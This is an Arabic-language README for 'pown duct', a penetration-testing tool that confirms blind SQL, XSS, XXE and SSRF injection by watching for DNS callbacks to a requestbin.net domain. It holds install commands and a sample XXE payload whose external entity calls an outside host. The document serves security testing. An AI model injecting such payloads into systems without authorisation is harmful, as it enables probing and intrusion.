
أداة أساسية لاكتشاف هجمات الحقن الأعمى.
أداة أساسية لاكتشاف هجمات الحقن العمياء باستخدام القنوات الجانبية لنظام أسماء النطاقات.
هذه الأداة جزء من مبادرة المصادر المفتوحة لـ secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
ملاحظة: تستفيد هذه الأداة من خدمة http://requestbin.net. ستستخدم الإصدارات المستقبلية بنية تحتية مخصصة ومبنية حسب الطلب.
هذه الأداة مصممة للاستخدام كجزء من Pown.js ولكن يمكن استدعاؤها بشكل منفصل كأداة مستقلة.
قم بتثبيت Pown أولاً كالمعتاد:
$ npm install -g pown@latest
استدعاء مباشر من Pown:
$ pown duct
بدلاً من ذلك، قم بتثبيت هذه الوحدة محلياً من جذر مشروعك:
$ npm install @pown/duct --save
بمجرد الانتهاء، قم باستدعاء واجهة سطر أوامر pown:
$ ./node_modules/.bin/pown-cli duct
يمكنك أيضاً استخدام pown العام لاستدعاء الأداة محلياً:
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
هناك حالات نحتاج فيها إلى تنفيذ هجوم مثل حقن SQL أو XSS أو XXE أو SSRF ولكن التطبيق المستهدف لا يقدم أي مؤشر على أنه قابل للاختراق. إحدى الطرق للتأكد من وجود ثغرة أمنية هي محاولة حقن متجه هجوم صالح يجبر محلل DNS على الاستعلام عن نطاق مسيطر عليه. إذا نجحت عملية الاستعلام، فسيتم اعتبار الهجوم ناجحاً.
ملاحظة: قد تكون على دراية بـ Burp Collaborator الذي يقدم خدمة مماثلة للعملاء.
أولاً، نحتاج إلى اسم DNS مؤقت لحلّه:
$ pown duct dns
screenshot
باستخدام DNS المقدم، قم بتأليف حمولتك. على سبيل المثال، ما يلي يمكن أن يؤدي إلى استعلام DNS إذا كانت ثغرة XXE موجودة.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
إذا نجح الهجوم، سنتلقى رسالة في الطرفية.
screenshot